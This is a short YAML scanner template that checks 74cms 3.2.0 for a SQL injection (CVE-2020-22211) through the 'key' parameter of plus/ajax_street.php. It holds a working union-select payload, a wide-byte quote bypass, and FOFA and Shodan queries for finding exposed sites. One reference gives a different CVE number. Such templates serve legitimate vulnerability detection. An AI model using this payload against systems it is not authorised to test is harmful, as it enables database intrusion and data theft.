id: CVE-2020-22211

info:
  name: 74cms - ajax_street.php 'key' SQL Injection
  author: ritikchaddha
  severity: critical
  verified: true
  description: |
    SQL Injection in 74cms 3.2.0 via the key parameter to plus/ajax_street.php.
    FOFA: app="74cms"
    SHODAN: http.html:"74cms"
  reference:
    - https://github.com/blindkey/cve_like/issues/10
    - https://nvd.nist.gov/vuln/detail/CVE-2020-22208
  tags: cve,cve2020,74cms,sqli
  created: 2023/06/16

set:
  num: randomInt(800000000, 1000000000)
rules:
  r0:
    request:
      method: GET
      path: /plus/ajax_street.php?act=key&key=%E9%8C%A6%27%20union%20select%201,2,3,4,5,6,7,md5({{num}}),9%23
    expression: response.body.bcontains(bytes(md5(string(num))))
expression: r0()